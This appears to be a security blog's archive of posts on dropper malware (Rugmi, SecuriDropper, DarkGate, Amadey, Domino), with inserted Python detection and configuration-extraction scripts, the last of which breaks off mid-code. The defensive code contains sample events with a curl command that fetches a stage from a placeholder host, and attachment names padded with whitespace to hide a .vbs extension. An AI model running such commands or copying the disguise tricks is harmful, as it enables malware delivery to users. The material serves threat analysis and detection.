Dropper Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/dropper/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Novice Rugmi Loader Delivers Various Spyware
https://gridinsoft.com/blogs/rugmi-loader-delivers-spyware/ (Thu, 28 Dec 2023 23:32:44 +0000)

The post Novice Rugmi Loader Delivers Various Spyware appeared first on Gridinsoft Blog.

The threat landscape meets a new player – Rugmi Loader. This threat specializes in spreading spyware, and is in fact capable of delivering any malware type. Rugmi boasts of its unusual structure, which makes it rather promising among other loaders.

What is Rugmi Loader?

Rugmi is a complex loader with multiple components that deliver information stealers. According to the report, Rugmi detections multiplied in October and November 2023 alone. Initially observed only a handful of times, Rugmi has experienced a dramatic increase in activity, with daily detections now numbering in the hundreds. This trend was particularly noticeable in the last months of 2023.

Rugmi Loader detection trend (source: ESET)

The design of the Rugmi Loader features three components that allow it to unleash its malicious payload. The first component is a downloader tasked with retrieving an encrypted payload. It fetches the necessary malicious software while evading detection through encryption.

The second component is a loader for a payload stored in internal resources. This means the malware can arrive with an embedded payload and run it once all of the initial checks pass. Such internal execution lets the malware operate seamlessly, blending into the system’s processes without raising immediate alarms.

Finally, the third component is a loader for external files: it activates a payload from an external file, the one downloaded on command from the C2. This delivery method is more classic and allows for steadier operations, though it may be unsuitable for attacks that require rapid action. Combining the two methods in one loader is quite new, and it will certainly play its part in this malware’s performance.

The primary targets of these campaigns have been identified as the U.S. and Canada, indicating a strategic focus on regions with high-value targets. Such localization coincides with the activity of major spyware families, particularly Vidar, Raccoon and Lumma.

Loader Malware Explained

As the name suggests, loader (or dropper) malware is malicious software designed primarily to download and install other malware onto a compromised system. In short, it acts as a gateway for more malware. A loader gains a foothold on the system and then fetches other harmful payloads from a remote server. This makes the overall deployment easier, allows the operators to weed out honeypots, and makes analysis of the entire attack chain more complicated.

The final payloads of loaders can be anything from ransomware and banking trojans to spyware. A loader’s primary purpose is not to cause direct harm but to pave the way for “normal” malware. This road paving also includes changing system properties so that there are far fewer obstacles to further malware injection.

How dangerous is Rugmi Loader?

There are quite a few loaders in the modern threat landscape, but Rugmi has the merits to make it competitive, if not prevalent. Currently, this market is dominated by Amadey, which is built around a more straightforward approach. Rugmi’s modularity makes it more potent in all attack scenarios. At the same time, the rapid growth of a newcomer may motivate old players to evolve, which will spice up the malware world even more.

Nonetheless, the benefits it brings concern the quantity rather than the quality of the malware Rugmi can deploy. Ransomware, spyware, stealers: each develops at its own pace and along its own path, and changes in delivery methods barely affect that. And since the new loader is nothing groundbreaking, there is no reason to expect huge shifts in the paradigm.

Protect Yourself Against Malware

To safeguard against malware, including sophisticated threats like the Rugmi Loader, follow these essential practices:

  • Be cautious with emails and downloads. We recommend avoiding clicking links or downloading attachments from unknown or suspicious sources. Doing so may put your device and personal information at risk. Phishing emails are a common way to spread malware.
  • Use reputable antivirus software. The anti-malware solution is the first defense line against malware. Please ensure you have a reliable antivirus program installed and keep it updated. These programs can detect and remove many types of malware.
  • Beware of social engineering. With the rise of services like ChatGPT, even the most obtuse scammer can write a convincing, well-crafted email. Be skeptical of unsolicited offers or alarming messages demanding immediate action.
  • Educate yourself. Internet scams are evolving fast, and keeping abreast of current events means knowing how to confront them. Stay aware of the latest malware threats and learn to recognize potential risks to ensure your online safety. Forewarned is forearmed.

SecuriDropper Bypasses Google Play & Android Defenses
https://gridinsoft.com/blogs/securidropper-android-google-play/ (Wed, 08 Nov 2023 22:09:24 +0000)

SecuriDropper is a rare example of Android dropper malware that operates under the dropper-as-a-service (DaaS) model. This malware is raising significant concerns among experts due to its ability to bypass Google’s enhanced security measures and deliver a variety of malicious payloads.

What is SecuriDropper Malware?

SecuriDropper represents the latest evolution in the ever-changing world of cyber threats. It serves as a conduit for cybercriminals to efficiently distribute their malware in a convenient way. This, actually, is a key point of the dropper-as-a-service model. Such innovation enables threat actors to separate the development and execution of an attack from the installation of malware. This trick offers a level of sophistication that is both concerning and challenging to combat.

Two-stage infection process of SecuriDropper

Dropper malware plays a crucial role in the cybercriminal ecosystem. It acts as a precursor tool designed to provide initial access to the target system. Its primary function is to download and install a malicious payload on the victim’s device, making it a valuable tool for threat actors. This strategic approach allows malicious actors to advertise their services to other criminal groups, creating a lucrative business model.

Distribution of Malicious Payloads

SecuriDropper has been observed distributing a range of malicious payloads, including Android banking trojans such as SpyNote and ERMAC. These trojans are often disguised as legitimate applications and are distributed through deceptive websites and third-party platforms like Discord. The resurgence of Zombinder, another Dropper-as-a-Service tool, has further amplified concerns about the distribution of malware payloads through sideloaded apps.

SecuriDropper is a stark reminder that the fight against cyber threats is an ongoing and evolving battle. As Android continues to implement enhanced security measures, cybercriminals adapt and innovate, finding new ways to infiltrate devices and distribute malware. Dropper-as-a-Service platforms have become powerful tools for malicious actors, posing significant challenges to Android security.

Android 13 Feature Blocks SecuriDropper

Despite the rather gloomy picture above, things are not that bad. Users who received the Android 13 update for their devices can counteract SecuriDropper on their own. A new feature called Restricted Settings does exactly what its name suggests for sideloaded applications.

Restricted Settings warning notifications

As the dropper aims at getting excessive permissions, particularly to Accessibility and Notifications, the feature will block such permissions by default. This, however, is an Android 13-only feature, so users of earlier OS versions should be careful when granting permissions.

Folks with the most recent updates should not be reckless either. There is a chance of an infected app appearing in Google Play, which nullifies any protection aimed at sideloaded apps. And since Google is slow to add security features to its official app source, it remains a potential source of threats.

How to Protect Yourself from SecuriDropper

SecuriDropper is a sophisticated Android dropper-as-a-service malware that poses a significant threat to the security of Android devices. To protect yourself from this emerging threat and similar malware, follow these security measures:

  • Only download applications from official app stores like Google Play Store. These platforms implement stringent security measures to ensure the safety of the apps they host.
  • Regularly update your Android device’s operating system and installed applications. Software updates often include security patches that address known vulnerabilities.
  • Install a reputable mobile security solution on your device. These security apps can help detect and remove threats like SecuriDropper from your device.
  • Be cautious when considering sideloaded apps obtained from unofficial sources. While sideloading offers access to a wider range of apps, it also presents security risks. Ensure you trust the source and origin of sideloaded apps.
  • Pay close attention to the permissions requested by apps during installation. Avoid granting unnecessary permissions to apps. For example, if a simple flashlight app requests access to your contacts and camera, it may be suspicious.
  • Regularly back up your important data to a secure location or cloud storage. This ensures you can recover your data in case of a malware infection.

By following these security measures, you can reduce the risk of falling victim to SecuriDropper and other similar threats. Remember that staying vigilant and proactive in protecting your Android device is essential in today’s evolving threat landscape.

Skype & Microsoft Teams Spam Spreads DarkGate Loader
https://gridinsoft.com/blogs/skype-microsoft-teams-spam-darkgate-loader/ (Wed, 25 Oct 2023 10:28:39 +0000)

Over the past few years, DarkGate has been relatively inactive. However, several campaign deployments have been detected this year across the Americas, Asia, the Middle East, and Africa. They started to aim at Microsoft apps, such as Skype and Teams, for spreading to target systems.

What is DarkGate Loader?

DarkGate Loader is a type of malware that is capable of downloading and running other types of malware, including ransomware, trojans, and cryptocurrency miners. Additionally, it can be used to extract sensitive data from the victim’s computer, such as passwords, credit card numbers, and personal information.

This malware is typically distributed via phishing emails or malicious attachments. Once it is installed on the victim’s computer, it can communicate with a remote command and control (C2) server to receive instructions and download additional malware.

Distribution of the DarkGate campaign (August to September 2023)

DarkGate Loader has been gaining popularity among cybercriminals since its creator advertised it as a Malware-as-a-Service offering on popular forums in June 2023. Previously, DarkGate Loader was distributed using traditional email-based malspam campaigns, similar to those used by Emotet. However, an operator started using Microsoft Teams to deliver the malware in August via HR-themed social engineering chat messages. This new tactic has led to an increase in the number of DarkGate Loader infections.

DarkGate Spreads Via Microsoft Teams And Skype Spam

A company has been facing a targeted phishing attack since late September. The attackers have been using Microsoft Teams functionality to deliver the DarkGate Loader malware. Fortunately, all the employees were regularly trained to identify phishing attempts, and they promptly intervened. As a result, no employees, customers, or company resources were harmed during this incident. The malicious message was blocked before it could reach any of the employees.

Teams message with a malicious attachment

After analyzing a recent case, we discovered that the DarkGate Loader malware was delivered in the payload of a ZIP archive. The image below illustrates the entire attack process, from the moment the Microsoft Teams message is sent to the execution of the DarkGate Loader:

Microsoft Teams Attack chain

In the next sample, the threat actor exploited a trusted relationship between two organizations to trick the recipient into running the attached VBA script. By gaining access to the victim’s Skype account, the attacker could take control of an existing messaging thread and create file names related to the chat history’s context.

DarkGate infection chain abusing Skype

The victims were sent a message from a compromised Skype account. The message contained a deceptive VBS script with a file name that followed the format “ www.skype[.]vbs”. The spacing in the file name was deliberately designed to trick the user into thinking that the file was a .PDF document while hiding the real format, which was www.skype[.]vbs. In this sample, the recipient believed that the sender was someone from a trusted external supplier.

Installation Consequences

Experts noticed that the threat was functioning as a downloader of further payloads. Once the DarkGate malware was installed, it deposited files in both the C:\Intel\ and %appdata%\Adobe\ directories, which aided its attempt to disguise itself.

The dropped files were identified as variations of either DarkGate or Remcos, most likely to enhance the attackers’ hold on the infected system. Below are some of the sample file names we came across for these additional payloads:

  • Folkevognsrugbrd.exe
  • logbackup_0.exe
  • sdvbs.exe
  • Vaabenstyringssystem.exe
  • Sdvaners.exe
  • Dropper.exe
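As an added example (not code from the post or from Gridinsoft), the two indicators described above, an attachment name padded with whitespace to hide its .vbs extension and executables started from C:\Intel\ or %APPDATA%\Adobe\, can be turned into a small triage check. The event records, the user name and the %APPDATA% mapping below are constructed; the payload names are the ones listed above.

```python
import re
from typing import Dict, List, Optional, Tuple

# Extensions Windows executes as a script or program when double-clicked.
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".exe", ".scr", ".bat", ".cmd", ".ps1"}
# Document/image extensions a victim expects to see; used to spot "x.pdf<spaces>y.vbs" names.
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Drop locations named in the post; %APPDATA% is expanded per host via the `env` mapping.
DROP_DIRS = ("C:\\Intel\\", "%APPDATA%\\Adobe\\")
# Payload names quoted in the post (weak indicator on their own: names are trivial to change).
KNOWN_PAYLOAD_NAMES = {"folkevognsrugbrd.exe", "logbackup_0.exe", "sdvbs.exe",
                       "vaabenstyringssystem.exe", "sdvaners.exe", "dropper.exe"}


def attachment_name_reason(filename: str, min_run: int = 3) -> Optional[str]:
    """Return why an attachment name looks deceptive, or None.

    Covers a run of whitespace (\\s also matches a non-breaking space) that pushes
    the real extension out of the visible part of the name, and a decoy document
    extension placed right before the real script extension.
    """
    name = filename.replace("[.]", ".")  # accept defanged names copied from reports
    if "." not in name:
        return None
    stem, _, ext = name.rpartition(".")
    ext = "." + ext.strip().lower()
    if ext not in SCRIPT_EXTENSIONS:
        return None
    if re.search(r"\s{%d,}" % min_run, stem):
        return "whitespace run hides real extension %s" % ext
    lowered = stem.lower()
    for decoy in sorted(DECOY_EXTENSIONS):
        if lowered.endswith(decoy):
            return "decoy extension %s before real extension %s" % (decoy, ext)
    return None


def normalize_path(path: str, env: Dict[str, str]) -> str:
    """Expand %VAR% references (case-insensitive), unify separators, lower-case."""
    p = path.replace("/", "\\")
    for var, value in env.items():
        p = re.sub(r"%" + re.escape(var) + r"%", lambda _m, v=value: v, p, flags=re.IGNORECASE)
    return p.lower()


def drop_path_reason(image_path: str, env: Dict[str, str]) -> Optional[str]:
    """Flag an executable started from a drop directory; stronger if its name matches
    one quoted in the post. OEM software does live under C:\\Intel on some machines,
    so treat this as a triage signal, not a verdict."""
    p = normalize_path(image_path, env)
    if not p.endswith(".exe"):
        return None
    basename = p.rsplit("\\", 1)[-1]
    for drop in DROP_DIRS:
        if p.startswith(normalize_path(drop, env)):
            if basename in KNOWN_PAYLOAD_NAMES:
                return "known DarkGate payload name %s under %s" % (basename, drop)
            return "executable started from drop directory %s" % drop
    return None


def scan_events(events: List[Dict[str, str]], env: Dict[str, str]) -> List[Tuple[str, str]]:
    """Run both heuristics over simplified events; returns (event id, reason) pairs."""
    hits = []
    for ev in events:
        reason = None
        if ev["kind"] == "attachment":
            reason = attachment_name_reason(ev["name"])
        elif ev["kind"] == "process":
            reason = drop_path_reason(ev["image"], env)
        if reason:
            hits.append((ev["id"], reason))
    return hits


# Constructed sample data: a fictional user "alice" and a handful of events.
SAMPLE_ENV = {"APPDATA": "C:\\Users\\alice\\AppData\\Roaming"}
SAMPLE_EVENTS = [
    {"id": "e1", "kind": "attachment", "name": "Annual report 2023.docx"},
    {"id": "e2", "kind": "attachment", "name": "invoice.pdf" + " " * 24 + "www.skype.vbs"},
    {"id": "e3", "kind": "attachment", "name": "scan.pdf.vbs"},
    {"id": "e4", "kind": "process", "image": "C:\\Intel\\logbackup_0.exe"},
    {"id": "e5", "kind": "process", "image": "C:\\Users\\alice\\AppData\\Roaming\\Adobe\\updater.exe"},
    {"id": "e6", "kind": "process", "image": "C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat.exe"},
    {"id": "e7", "kind": "process", "image": "C:\\Windows\\System32\\svchost.exe"},
]

if __name__ == "__main__":
    for event_id, reason in scan_events(SAMPLE_EVENTS, SAMPLE_ENV):
        print(event_id, reason)
```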

How to protect against DarkGate Loader?

DarkGate Loader is a dangerous malware that can be used to steal sensitive data from your computer and install other malware, such as ransomware and trojans. Whether you are an individual or an organization, it is important to be aware of the risks posed by DarkGate Loader and to take steps to protect yourself.
To protect you and your organization against DarkGate Loader, you can take the following steps:

  • Use a reliable password manager to create and store strong, unique passwords for all your accounts. Strong passwords are hard to guess and can protect your accounts from brute force attacks.
  • Implement a web content filtering solution to block malicious websites. A web content filter prevents access to known malware and phishing sites.
  • Deploy a next-generation firewall (NGFW) to protect your network from malicious traffic. An NGFW can help to detect and block malware, phishing emails, and other types of cyberattacks.
  • Only download software and files from reputable sources. Avoid downloading files from suspicious websites or using unofficial app stores.
  • Use EDR/XDR to provide real-time monitoring, threat detection, and incident response capabilities across your network and endpoints. These tools can identify unusual or suspicious activities that could indicate loader malware.

DarkGate Loader Expands Activity, Delivers Ransomware
https://gridinsoft.com/blogs/darkgate-loader-delivers-ransomware/ (Mon, 04 Sep 2023 08:35:39 +0000)

A new DarkGate malware deployment campaign has caught the attention of cybersecurity researchers. This was fueled by the developer’s decision to lease its product to a limited number of affiliates.

DarkGate Malware Activity Spikes as Developer Rents It Out

According to cybersecurity researchers, a new DarkGate malware campaign has caused a stir. It spreads through phishing emails and uses stolen email threads to trick users into clicking a hyperlink that downloads the malware. Initial analysis showed the sample closely resembling DarkGate: the initial infection routine and the observed C2 communication protocol were nearly identical to past analyses of the same family. Further research confirmed, based on embedded strings and functionality, that the sample is indeed part of the DarkGate malware family. The recent surge in DarkGate activity is most likely due to the developer having rented out the malware to a few affiliates.

DarkGate Loader Details

DarkGate is malware sold primarily on underground forums by a user nicknamed RastaFarEye. This malware is designed to avoid detection by security software, and it can establish persistence through Windows Registry modifications to gain elevated privileges. As for damage – it steals data from web browsers, Discord, FileZilla, and other software and connects to a command-and-control (C2) server to perform tasks. These tasks may include file enumeration, data exfiltration, launching cryptocurrency miners, capturing screenshots remotely, and executing other commands.

Spreading

Traditionally, phishing attacks have been the primary delivery route for malware, and this case is no exception; according to some reports, 79% of malware in Q2 2023 was delivered via phishing emails. Specialists have identified two distinct DarkGate infection scenarios. In the first, an MSI installer file is the initial payload. Victims receive this file by clicking on a link included in a phishing message. The link leads to a traffic distribution system (TDS), which redirects the victim to the final payload URL for the MSI download if the attacker’s requirements are met. Opening the downloaded MSI file triggers the DarkGate infection.

Spreading the DarkGate loader through phishing emails

In addition, experts have discovered samples of another campaign that uses a Visual Basic script to deliver the initial payload. However, experts do not know precisely how the initial payload reaches the victim. The script is obfuscated and contains decoy/junk code. Later, it invokes the curl binary that comes pre-installed with Windows to download the AutoIt executable and script file from a server controlled by the attacker. After that, the infection chain follows the previously described campaign.

Distributing DarkGate loader via Visual Basic script

Key Action of DarkGate Loader

DarkGate is a modular loader that can deliver a variety of payloads, including ransomware, botnets, trojans, keyloggers, spyware, and DLL files, which makes it a versatile and dangerous piece of malware. The loader waits for commands from the command server: when the C2 sends a message containing the IP address of a secondary server, DarkGate retrieves the payload from there.

The malware uses the DLL file format to run stealthily, loading the library into memory via the system process rundll32.exe or injecting it into an application with weak or no DLL validation. From there, the malware steals confidential data such as passwords and cookies from the victim’s system. It targets web browsers, email software, and applications like Discord or FileZilla. The malware uses legitimate freeware tools published by Nirsoft to extract information, and it can access the operating system, the logged-on user, the currently running programs, and other data sources. This information is sent to the C2 server and is available in the threat actor’s panel. Additionally, the malware can collect arbitrary files from the victim system when requested through the C2 channel.
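As an added example, not code from the post or from any vendor it cites, the chain described in the two preceding sections (a script host starting the built-in curl, the AutoIt interpreter run from a user-writable path, and rundll32.exe loading a DLL from a drop location) can be expressed as process-lineage checks over process-creation events. The events, user name, paths and hostnames below are constructed; the record fields mirror those a Sysmon process-creation event carries.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Directories a standard user can write to. Legitimate rundll32/AutoIt use from
# these is rare, which makes them a useful pivot for this chain.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon Event ID 1 carries)."""
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    return path.replace("/", "\\").lower().startswith(USER_WRITABLE_PREFIXES)


def chain_reason(ev: ProcessEvent) -> Optional[str]:
    """Return the stage of the DarkGate chain an event resembles, or None.
    Each match is a triage signal; a developer running AutoIt from a home
    directory will also trip the second check."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    cmd = ev.command_line.lower()
    # Stage 1: the obfuscated VBS invokes the pre-installed curl to fetch the next stage.
    if parent in SCRIPT_HOSTS and image == "curl.exe":
        return "script host spawned curl.exe"
    # Stage 2: the downloaded AutoIt interpreter runs a script from a user-writable path.
    au3 = re.search(r'([a-z]:\\[^" ]+\.au3)', cmd)
    if image == "autoit3.exe" or au3:
        if _user_writable(ev.image) or (au3 and _user_writable(au3.group(1))):
            return "AutoIt interpreter/script run from user-writable path"
    # Stage 3: the DLL-format payload is loaded through rundll32.exe from a drop location.
    if image == "rundll32.exe":
        dll = re.search(r'([a-z]:\\[^",]+\.dll)', cmd)
        if dll and _user_writable(dll.group(1)):
            return "rundll32.exe loading DLL from user-writable path"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """(pid, reason) for every event that matches a stage."""
    hits = []
    for ev in events:
        reason = chain_reason(ev)
        if reason:
            hits.append((ev.pid, reason))
    return hits


def lineage(events: List[ProcessEvent], pid: int) -> List[str]:
    """Process ancestry, root first, by following ppid links within the event set."""
    by_pid: Dict[int, ProcessEvent] = {ev.pid: ev for ev in events}
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))


# Constructed sample: fictional user "alice", placeholder hostnames under .invalid/.example.
TMP = "C:\\Users\\alice\\AppData\\Local\\Temp"
SAMPLE_EVENTS = [
    ProcessEvent(400, 1, "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\userinit.exe", "explorer.exe"),
    ProcessEvent(501, 400, "C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\explorer.exe",
                 'wscript.exe "C:\\Users\\alice\\Downloads\\www.skype.vbs"'),
    ProcessEvent(502, 501, "C:\\Windows\\System32\\curl.exe", "C:\\Windows\\System32\\wscript.exe",
                 "curl.exe -o " + TMP + "\\a.au3 http://stage.example.invalid/a"),
    ProcessEvent(503, 501, TMP + "\\AutoIt3.exe", "C:\\Windows\\System32\\wscript.exe",
                 "AutoIt3.exe " + TMP + "\\a.au3"),
    ProcessEvent(504, 503, "C:\\Windows\\System32\\rundll32.exe", TMP + "\\AutoIt3.exe",
                 "rundll32.exe C:\\Users\\alice\\AppData\\Roaming\\Adobe\\stage.dll,Start"),
    ProcessEvent(505, 400, "C:\\Windows\\System32\\curl.exe", "C:\\Windows\\System32\\cmd.exe",
                 "curl.exe -O https://example.com/readme.txt"),
    ProcessEvent(506, 1, "C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\svchost.exe",
                 "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS):
        print(pid, reason, " -> ".join(lineage(SAMPLE_EVENTS, pid)))
```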

Defense evasion

After initialization, the malware proceeds to a function identified as the “C2 main loop.” In this loop, the malware periodically checks the C2 server for new instructions, executes the received commands, and sends back the results to the C2 server. The C2 main loop contains over 100 orders, including information gathering, self-management, self-update, stealer, crypto miner, RAT, and file management. The malware contains multiple functions to evade typical analysis tools. If the corresponding features are enabled, and the sample detects an environment that matches one of the checks, it will terminate the process. Moreover, the malware looks for multiple well-known AV products and may alter its behavior depending on the result. The discovered AV product is communicated back to the C2 server. The malware may also masquerade its presence and inject itself into legitimate Windows processes based on the used configuration.

Malware As a Service

Initially, the malware was only used privately by the developer. But now, malware authors offer it as a subscription service, with prices ranging from $1,000 per day to $15,000 per month to $100,000 per year. Moreover, the author claims that the malware is the “ultimate tool for pentesters/redteamers” and boasts of “features that you won’t find anywhere.” By the way, earlier versions of DarkGate also included a ransomware module. In any case, introducing the MaaS program will likely increase DarkGate malware campaigns, making it an ongoing threat in the future.

How to protect against DarkGate Loader?

Here are some tips on how to protect against DarkGate Loader:

  • Keep your software up to date. Software updates often include security patches that can help protect your devices from malware.
  • Be careful about what websites you visit and what links you click on. Malware, like DarkGate Loader, can spread through malicious websites and links.
  • Use a firewall to block unauthorized access to your devices. This can help prevent DarkGate Loader from infecting your devices.
  • Back up your data regularly. This way, if your devices are infected with DarkGate Loader, you can always restore your data from a backup.
  • Use a strong password manager to create and store strong passwords for your online accounts.
  • Enable two-factor authentication (2FA) for your online accounts. This will add an extra layer of security to your accounts.
  • Use an anti-malware solution with up-to-date signatures. It will help detect and remove DarkGate Loader if it does manage to infect your device.

Oneetx.exe – What is that process? Oneetx Removal
https://gridinsoft.com/blogs/oneetx-removal/ (Mon, 22 May 2023 15:56:39 +0000)

Oneetx.exe is a malicious process related to the Amadey dropper malware. It can be seen in Task Manager with seemingly nothing suspicious about it, unless you know what it stands for. Let me show you how it appears and how you can remove it.

What is Oneetx.exe process?

Oneetx.exe is a disguised name chosen by the Amadey dropper developers to hide their malware among other processes. Windows tracks all processes running in the system and displays what it finds in Task Manager. Obviously, obfuscated names like sv39103.exe attract attention and raise suspicion. That is why hackers opt for ordinary-looking names, often those of system processes or of popular software packages, like Photoshop or crypto mining software. This case, however, is different.

Oneetx.exe process in Task Manager

It appears that oneetx.exe does not belong to any program. Moreover, a Google search yields clear clues that this process belongs to malware that has acted as the backbone of a Russian botnet since 2018. The most obvious guess is, of course, Emotet, which is known for having possibly the most extensive networks on the planet. However, in this case, a short investigation showed that oneetx.exe is related to the Amadey dropper.

What is Amadey?

Amadey is a dropper (a.k.a. downloader) malware that has only one purpose: to deliver other malware to the infected system. It often acts as a precursor that makes sure the system is not in a banned region and is not a debug environment. It can deliver a wide range of threats, from the aforementioned Emotet to the RedLine stealer and even STOP/Djvu ransomware. Even after delivering the payload, it remains active, waiting for further commands from the hackers.

Aimed at a long-term stay in the system, Amadey does its best to hide from users and anti-malware software. Choosing an unremarkable name is only a small part of the way it disguises itself. First of all, each of its samples is repacked in a specific way, making it harder for antiviruses to detect. Amadey typically arrives within phishing emails with attached Office documents. Upon execution, the malware moves its files from the original directory to a different folder, chosen depending on the antivirus software present in the system. All these actions make it a pretty tough nut for “classic” antiviruses.

IoC Amadey Dropper

How to remove Oneetx.exe?

You will likely fail to remove Oneetx.exe from your system manually. It performs a series of persistence actions, so you would have to locate and undo all the changes it made to the system before touching its files. For that reason, I’d recommend using GridinSoft Anti-Malware – a program that specialises in removing threats like the Amadey dropper.

The program will not only help you with removing this malware, but also prevent any further infections. Its detection system makes it effective even against the newest tricks – regardless of the way they’re packed. However, anti-malware software should be your last line of defense. To stay secure, it is better to avoid any muddy waters at all. In the case of Amadey malware, the key is to be vigilant when you deal with email messages. Read our detailed analysis of modern spam emails and the way to recognise them.

Domino Backdoor is Led by FIN7 and Conti Actors
https://gridinsoft.com/blogs/domino-backdoor/ (Sat, 15 Apr 2023 22:13:57 +0000)

A new Domino Backdoor popped up at the beginning of 2023. Since February, a new malware family coined Domino has been used in attacks on corporations, with the Project Nemesis stealer as the final payload. Analysts say that the new backdoor is controlled and developed by ex-TrickBot/Conti actors and hackers related to the FIN7 group.

Who are Conti and FIN7?

First of all, let’s explain why the presence of actors from FIN7 and the defunct Conti gang is so noteworthy. FIN7 is a cybercrime gang that likely operates from Russia and Ukraine. It is also known under the names Carbanak (after the backdoor it uses), ITG14 and ALPHV/BlackCat. The group is most notorious for collaborations with widely-known threat actors, like the Ryuk and REvil ransomware crews, and for the release of its own ransomware, called ALPHV. That operation is still running and had a couple of noteworthy attacks in the past year.

ALPHV onion site, used by the gang to publish data leaked from victims that refused to pay the ransom

Conti is at once a similar and a different story. The group built its image around an eponymous ransomware sample. Like FIN7, this group of cybercriminals consists of actors from ex-USSR countries. However, the start of the war in February 2022 led to a quarrel among the group’s top management and the subsequent publication of its source code. That, eventually, led to the group’s dissolution. Before these events, Conti was a prolific ransomware gang with a major share of the market.

Their collaboration is not surprising in itself. Nature abhors a vacuum, so after the breakup former Conti members promptly joined other groups or started new ones. Joint development of brand-new malware with another gang is, however, an unusual case. It may mark the arrival of a new threat actor on the scene, or simply a powerful boost to the FIN7 gang.

Domino Backdoor Description

Domino is a classic example of a modern backdoor that doubles as a malware delivery mechanism. It has been observed spreading a separate dropper, coined Domino Loader. The backdoor provides remote access to the targeted system, while the loader handles malware deployment. The pair has been spotted in a rather unusual multi-step distribution chain.

Image: Domino multi-stage attack chain.

Dave Loader is a textbook dropper: its only job is to deliver other malware. Its presence in this chain is an interesting clue about the relationship between Domino and the Conti ransomware gang. Dave Loader delivers the Domino backdoor, which in quick succession fetches Domino Loader. At the final stage, Domino Loader drops the Project Nemesis stealer, which targets credentials for social networks, VPN clients and cryptocurrency services.

Why, Exactly, a Collaboration?

Two things indicate that Domino is a collaboration rather than a stand-alone development: the use of Dave Loader as the delivery mechanism, and code shared with FIN7’s own Lizar malware. Dave Loader is an internal Conti tool used exclusively in the gang’s attacks. Unlike the Conti ransomware code, it never leaked, so use by an unrelated third party is very unlikely. Lizar, a.k.a. Tirion/DiceLoader, is an auxiliary loader used by FIN7. Domino shares substantial code with it, including the bot ID generation and the data-package encryption routines. Moreover, Domino’s command servers sit in an IP range close to the one FIN7 uses for its C2s; both ranges belong to the MivoCloud hosting provider.

Domino Backdoor & Loader Analysis

Analysts from IBM Security Intelligence have already examined Domino samples, both the backdoor and the loader. First things first, so let’s start with the backdoor.

Domino Backdoor

The backdoor arrives on the infected system as a 64-bit C++ DLL. The DLL form makes stealthy execution easier: the droppers that deliver Domino generally launch it with shellcode embedded in the payload retrieved from the command server. Once running, Domino hashes system data to generate a bot ID. It primarily uses the username and computer name, then appends its own process ID to the hash. The final value looks like a648628c13d928dc-3250.

After hashing comes the decryption of the rest of Domino’s code. The binary carries an XOR-encrypted blob in its data section; the 16-bit XOR key is stored right before it. This blob holds not only further execution instructions but also the C2 communication data.

Image: Domino C2 communication code responsible for command handling.
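As an added example (not code from the original article or from the IBM report), here is an analyst-side extractor for the layout described above: an XOR key stored immediately in front of the encrypted data it protects. The key length is a parameter, since the article gives it as 16 bits while other samples may differ; the configuration blob, key and C2 strings below are constructed for the demonstration, and the printable-ratio heuristic for guessing the key length when it is unknown is this example’s own, not something the report describes.

```python
import re

# Constructed sample, not a real Domino configuration: a plaintext blob with two
# C2 endpoints, the XOR key used to encrypt it, and the key length the article gives.
CONFIG_PLAINTEXT = b"C2A=203.0.113.10:443;C2B=198.51.100.7:8443;MODE=1\x00"
XOR_KEY = b"\x5a\xc3"      # assumption: a 2-byte (16-bit) repeating key, as the article states
KEY_LEN = len(XOR_KEY)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_section(plaintext: bytes, key: bytes) -> bytes:
    """Lay the data out as the article describes: [key][XOR-encrypted data]."""
    return key + xor_bytes(plaintext, key)


def decrypt_section(section: bytes, key_len: int) -> bytes:
    """Split the leading key from the ciphertext and decrypt the rest."""
    if key_len <= 0 or len(section) <= key_len:
        raise ValueError("section too short for the given key length")
    return xor_bytes(section[key_len:], section[:key_len])


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that look like text; a correctly decrypted config scores ~1.0."""
    ok = sum(1 for b in data if 0x20 <= b < 0x7F or b in b"\r\n\t\x00")
    return ok / len(data) if data else 0.0


def guess_key_len(section: bytes, candidates=(1, 2, 4, 8, 16)) -> int:
    """Try each candidate key length and keep the one whose output is most text-like."""
    scored = [(printable_ratio(decrypt_section(section, n)), n)
              for n in candidates if len(section) > n]
    return max(scored)[1]


C2_RE = re.compile(rb"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})")


def extract_c2(decrypted: bytes) -> list:
    """Pull host:port pairs out of the decrypted blob, rejecting impossible values."""
    found = []
    for host, port in C2_RE.findall(decrypted):
        if all(int(o) <= 255 for o in host.split(b".")) and 0 < int(port) <= 65535:
            found.append((host.decode(), int(port)))
    return found


def extract_from_section(section: bytes, key_len=None) -> list:
    """End to end: guess the key length if not given, decrypt, list the C2 endpoints."""
    if key_len is None:
        key_len = guess_key_len(section)
    return extract_c2(decrypt_section(section, key_len))


if __name__ == "__main__":
    section = build_section(CONFIG_PLAINTEXT, XOR_KEY)
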